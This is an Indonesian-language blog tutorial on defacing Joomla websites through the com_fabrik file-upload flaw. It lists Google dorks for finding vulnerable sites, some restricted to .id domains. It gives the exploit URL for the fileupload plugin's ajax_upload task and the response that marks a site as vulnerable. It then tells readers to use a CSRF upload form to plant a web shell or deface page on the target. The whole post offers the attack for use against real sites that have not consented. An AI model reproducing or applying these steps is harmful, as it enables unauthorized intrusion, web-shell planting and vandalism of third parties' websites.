Cara Deface Com_Fabrik Dengan Csrf
Hallo World Kali ini Saya Bakalan Share Tutorial Deface Dengan Metode Com_Fabrik Lagi Tapi Bedanya Pada Tutorial Kali ini Saya Menggunakan CSRF Nah Sebelum Lebih Lanjut Sebenernya Apa Itu CSRF ? CSRF (Cross-site Request Forgery) merupakan suatu teknik hacking untuk mendapatkan atau bahkan menguasai suatu account dengan cara menyerang web yang dieksekusi atas wewenang korban, tanpa dikehendakinya.Nah Jika Kalian Sudah Tau Atau Paham Apa itu CSRF Langsung Aja Kita Ke Tutorial.Nah Buat Kalian Siapkan Bahan Bahan Di Bawah ini.
CSRF DISINI
MINISHELL DISINI
KOPI DIWARUNG
Nah Jika Sudah Siap Semua Kalian Dorking Lewat Dork Di Bawah Ini :
- inurl:index.php?option=com_fabrik
- /index.php?option=com_fabrik site:
- option=com_fabrik&format=raw site:
- com_fabrik site:
- /component/fabrik/ site:
- inurl:/com_fabrik site:.id
Kembangin Lagi Bre :)
Nah Jika Sudah Dork Nya Masukan Juga Exploit Nya Nih
Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Yosh Semua Udah Saya Kasih Kalian Dorking Saja Langsung.Nah Saya Anggap Kalian Sudah Dapat Target Nya.Jika Sudah Dapat Masukan Exploit Nya Maka Muncul {"filepath":null,"uri":null} ini Juga Yang Menjadi Ciri Ciri Vuln Dalam Tutorial Kali ini,Jadi Kalo Gak Muncul Seperti Itu Next Web Aja.Nah Saya Sudah Nemu Target.Kebetulan Target Saya Webnya Blank Terlalu Banyak Kenangan Masa Lalu Kwkwkwk.
Nah Langsung Saja Saya Masukan Exploit di Atas.Seperti Yang Saya Katakan Kalo VULN bakalan Muncul Seperti Ini
Silahkan Copy Webiste Yang Vuln Tadi Lalu Masukan Ke Csrf Ganti www.TARGET.com dengan Website Target Anda.Lalu Buka Csrf Dengan Browser.Nanti Bakalan Muncul Form Tempat Upload.Nah disini Kalian Upload Shell Kalo Gak Bisa Silahkan Upload Script Deface Kalian.Nah Disini Saya Hanya Upload Script Sebagai Contoh Saja.
No comments: